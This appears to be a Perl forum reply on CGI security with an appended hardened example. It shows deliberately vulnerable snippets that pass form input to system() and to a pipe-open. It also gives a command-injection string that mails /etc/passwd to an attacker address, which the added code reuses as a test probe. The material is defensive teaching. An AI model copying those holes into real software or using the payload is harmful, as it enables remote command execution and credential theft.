The most brutal example of this, and of an injection attack hole, that I can think of would be something like:

    handwaving of HTML here...
    <p>
    Type in the address you want to look up
    <input type="text" name="host_to_search_rq">
    </p>

with the CGI of

    #
    # Stuff left out....
    my $hostname = $cgi->param('host_to_search_rq');
    system("nslookup $hostname");    # BAD!!! BAD!!! BAD!!!
    #
    #

First off, it is conceivable that the malicious hax0r has partially compromised your system already and has a script of their own named "nslookup" sitting in your path, so you want to only invoke shell commands within your CGI using fully qualified pathnames to commands. That still doesn't fully get you off the hook, but it is a good start.

Secondly, having not checked the contents of $hostname and blindly executing the query leaves you open to an injection attack. A malicious induhvidual could enter the string ";cat /etc/password | /usr/ucb/Mail hax0rRus@hax0r.org" which then sends them the contents of your /etc/password file for a future brute force attack.

Another Dumb Idea® that I've actually seen folks do:

    Much handwaving again...
    if (! $cgi->param('command_rq') ) {
        print $cgi->p("input a command: ",
                      $cgi->textfield(-name => "command_rq") );
    } else {
        # OH MY GOD!!! DON'T DO THIS!
        open PIPE, $cgi->param('command_rq') . "|" or die $!;
        my @results = <PIPE>;
        print $cgi->pre(@results);
    }

Talk about asking for trouble!

Just a few ways to crash and burn in the world of CGI....

Just remember, the web is not the "village" it used to be anymore. It has grown up into a very large urban area with hookers and muggers on quite a few of the street corners. You would use caution if you had to walk through someplace like that in the Real World™, and you certainly wouldn't leave your doors unlocked there or put valuables out on the front porch. If you can think of a way to break your own security (and you should try and think of ways), someone else can too.


Peter L. Berghold -- Unix Professional
Peter -at- Berghold -dot- Net; AOL IM redcowdawg Yahoo IM: blue_cowdawg

In reply to Re^3: Structing a Web site and security issues by blue_cowdawg
in thread Structuring a Web site and security issues by bradcathey
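Added example, not part of blue_cowdawg's post: a hardened version of the nslookup CGI snippet above, showing the three fixes the post calls for together. Taint mode (-T) makes Perl refuse to hand unchecked request data to system() or open(); an allowlist regex both validates the hostname and untaints it (only a capture group clears the taint flag); and the list forms of open() and system() pass the value as a single argv element so /bin/sh never sees it, which is what kills the ";cat /etc/passwd | mail ..." trick. The function names, the /usr/bin/nslookup path and the self-check probes are assumptions for the example; the CGI.pm wiring from the post is left out.

```perl
#!/usr/bin/perl -T
# Hardened lookup handler (added example, not the original post's code).
# Run as:  perl -T lookup.pl   (taint mode must also be on the command line)
use strict;
use warnings;

# Under -T any external command needs an explicit, trusted PATH, and the
# shell-influencing variables must be cleared. We use a full path anyway.
$ENV{PATH} = '/usr/bin:/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Return an untainted hostname, or undef if the input is not a plain hostname.
# Labels are 1-63 alphanumerics or hyphens with no leading/trailing hyphen, so
# the result can never start with '-' (an option to nslookup) or contain any of
# ; | & ` $ ( ) < > or whitespace. The capture group is what untaints it.
sub validate_hostname {
    my ($raw) = @_;
    return undef unless defined $raw and length($raw) <= 253;
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;
    return $1 if $raw =~ /\A((?:$label\.)*$label\.?)\z/;
    return undef;
}

# Run the lookup and return its output lines. Fully qualified path, and the
# LIST form of pipe-open: Perl fork()s and exec()s nslookup directly with the
# hostname in argv[1], instead of handing a command string to /bin/sh the way
# open(PIPE, "$cmd|") or system("nslookup $hostname") would.
sub run_lookup {
    my ($hostname) = @_;                       # assumed already validated
    open(my $fh, '-|', '/usr/bin/nslookup', $hostname)
        or die "cannot run /usr/bin/nslookup: $!";
    my @out = <$fh>;
    close $fh;
    return @out;
}

# Handler for the host_to_search_rq form field; returns the HTML fragment.
# Output is HTML-escaped before being echoed back, so resolver output cannot
# be used to inject markup into the page either.
sub handle_request {
    my ($raw) = @_;
    my $host = validate_hostname($raw);
    return "<p>Not a valid hostname.</p>\n" unless defined $host;
    my @out = run_lookup($host);
    for (@out) {
        s/&/&amp;/g;
        s/</&lt;/g;
        s/>/&gt;/g;
    }
    return "<pre>" . join('', @out) . "</pre>\n";
}

# Self-check when run from the command line; no network needed, since only the
# validator is exercised. Probe strings are constructed for this example.
if (!caller) {
    for my $probe ('www.example.com',
                   ';cat /etc/passwd | /usr/ucb/Mail hax0rRus@hax0r.org',
                   '-badoption',
                   'a..b') {
        printf "%-55s => %s\n", $probe,
            defined validate_hostname($probe) ? 'accepted' : 'REJECTED';
    }
}
```

The same pattern fixes the second example in the post: there is no safe way to pipe-open a user-supplied command string, but if you must run a program chosen by the user, map the request onto a fixed table of full pathnames and pass any arguments through a list-form open() after validating each one against an allowlist, exactly as the hostname is handled here.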